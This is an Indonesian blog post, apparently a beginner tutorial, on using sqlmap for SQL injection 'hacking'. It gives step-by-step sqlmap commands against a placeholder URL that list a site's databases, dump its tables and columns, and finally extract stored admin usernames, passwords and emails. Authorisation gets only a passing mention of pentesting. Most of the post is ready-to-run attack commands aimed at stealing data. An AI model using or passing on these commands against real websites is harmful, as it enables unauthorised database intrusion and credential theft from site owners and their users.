Pada postingan kali ini saya akan post untuk cara menggunakan aplikasi sqlmap untuk hacking sql injection. Dan nanti untuk kedepannya saya juga akan membuat postingan sql injection dengan menggunakan param tamper atau yang lebih lengkap lagi, berikut kita langsung saja untuk penggunaan sqlmap dasar, ikuti langkah-langkahnya sebagai berikut.
langkah-langkah.
1. untuk perintah sqlmap kita langsung jalankan perintah di bawah.
python2 sqlmap.py -u http://target.com/page.php?id=1 --dbs
keterangan:
-u : untuk target url
--dbs : berfungsi untuk menghitung/mengambil database yang terdeteksi
2. Pada langkah ini kita akan dump table, di database yang telah kita dapat. berikut perintah yang di gunakan.
python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database --dump
Keterangan:
-D : Perintah untuk memilih database di ikuti dengan nama database, terkadang dalam satu web server terdapat lebih dari satu database
--dump : Perintah untuk melakukan ekstrak atau mengambil semua isi dalam database yang di pilih
3. Pada langkah selanjutnya ini kita akan dump isi table setelah kita dump database dan mendapatkan table berikut isi perintahnya. Lanjut langkah selanjtunya.
python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database -T nama_table --columns --dump
4. Pada langkah akhir kita akan melakukan dump columns pada langkah ini isi website target yang di dump column akan terlihat semua mulai dari columns data admin, password dan lain-lain. jalankan dengan perintah berikut ini.
python2 sqlmap.py -u http://target.com/page.php?id=1 -D nama_database -T nama_table -C nama_column1,nama_columns2(contoh: password,user,email) --dump
5. Selesai Anda dapat melihat isi database milik website yang Anda lakukan pentesting dengan tools Sqlmap. pada bagian dump data terakhit itu lah Anda dapat melihat username dan password yang tersimpan di website.
Share this :
0 Komentar
Penulisan markup di komentar